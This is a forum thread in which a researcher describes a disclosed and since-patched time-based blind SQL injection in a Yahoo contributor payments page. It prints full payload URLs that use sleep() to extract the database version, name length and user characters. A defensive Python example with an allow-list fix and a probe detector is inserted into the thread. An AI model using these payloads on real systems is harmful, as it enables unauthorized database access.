b3hr0uz Posted October 9, 2014

First of all, let's figure out the database version:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=4+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

Which is false (version 4) and will sleep for 20 seconds. Let's try version 5:

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN substring((select version()),1,1)=5 THEN(sleep(1)) ELSE (sleep(20))END As BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

After a quick second, we got returned to our data-table page.

Now, as far as the database name goes, I will demonstrate only a few things, due to the fact that the user length was 24 letters and the database name was 6 letters:

username: ****ww

contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select+1+from+(select+CASE+WHEN+(select+LENGTH(DATABASE()))=6+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc&start_date=&override_id=131114?cat=2?cat=2?cat=4?cat=69

And for the username: ***********@**.***.*.*** (taken out for security purposes), but as you can see, the 15th letter is shown to be a "." in the URL below:

http://contributor.yahoo.com/library/payments/data-table/?approved[]=1&approved[]=0&approved[]=0&approved[]=2&approved[]=2&approved[]=1&content_type[]=distribution&content_type[]=bonus&content_type[]=bonus&content_type[]=video&content_type[]=video&content_type[]=distribution&date_range=-e&end_date=e&override_id=131114?cat=2?cat=2?cat=4?cat=69&page=1&sort_column=(select 1 from (select CASE WHEN ASCII(substring((select user()),15,1))=46 THEN(sleep(1)) ELSE (sleep(60))END As BS)v)&sort_dir=asc&start_date=&override_id=131114

After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be covering an XSPA and XSS in a few services.

Behrouz Sadeghipour
@NahamSec
NahamSec.com | Behrouz Sadeghipour's Personal Website
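The injection point in the write-up above is the `sort_column` value, which ends up inside an ORDER BY clause, a position that cannot take a bind parameter. The following Python is an added example (not from the original post or from Yahoo's code): it shows the concatenation pattern that makes such a parameter injectable, the allow-list mapping that fixes it, and a check that flags time-based probes like the ones quoted in the thread in a request URL. The query, column names and the sample URL are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request, shaped like the write-up's payload (shortened).
SAMPLE_URL = (
    "https://example.invalid/library/payments/data-table/?page=1"
    "&sort_column=(select+1+from+(select+CASE+WHEN+substring((select+version()),1,1)=5"
    "+THEN(sleep(1))+ELSE+(sleep(20))END+As+BS)v)&sort_dir=asc"
)


def vulnerable_order_by(sort_column, sort_dir):
    """Defect pattern: ORDER BY assembled by string formatting.
    Whatever the client sends reaches the SQL parser unchanged."""
    return f"SELECT id, amount FROM payments ORDER BY {sort_column} {sort_dir}"


# Hardened form: client-supplied names are only keys into a fixed mapping.
ALLOWED_COLUMNS = {"date": "created_at", "amount": "amount", "status": "approved"}
ALLOWED_DIRS = {"asc": "ASC", "desc": "DESC"}


def sort_params_allowed(sort_column, sort_dir):
    """True only if both values are known keys; anything else is rejected."""
    return sort_column in ALLOWED_COLUMNS and sort_dir.lower() in ALLOWED_DIRS


def safe_order_by(sort_column, sort_dir):
    """Build ORDER BY from allow-listed identifiers, never from raw input."""
    if not sort_params_allowed(sort_column, sort_dir):
        raise ValueError("unsupported sort parameter")
    col = ALLOWED_COLUMNS[sort_column]
    direction = ALLOWED_DIRS[sort_dir.lower()]
    return f"SELECT id, amount FROM payments ORDER BY {col} {direction}"


# Markers of MySQL time-based blind probes as seen in the thread.
TIME_PROBE = re.compile(r"\b(sleep|benchmark)\s*\(|\bcase\s+when\b", re.IGNORECASE)


def find_time_probes(url):
    """Return the names of query parameters whose decoded value looks like a
    timing probe; useful as a WAF rule or access-log detection."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return [name for name, values in params.items()
            if any(TIME_PROBE.search(v) for v in values)]
```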
ncroot Posted December 30, 2014

Acunetix used for detection? )
mundy. Posted March 12, 2015

resolved..
askwrite Posted March 12, 2015

> resolved..

Resolved what?

> After 36 days I finally heard back from Yahoo that it has been patched! Thank you for reading! In a few weeks I will be covering an XSPA and XSS in a few services.

And it's from 2014 anyway...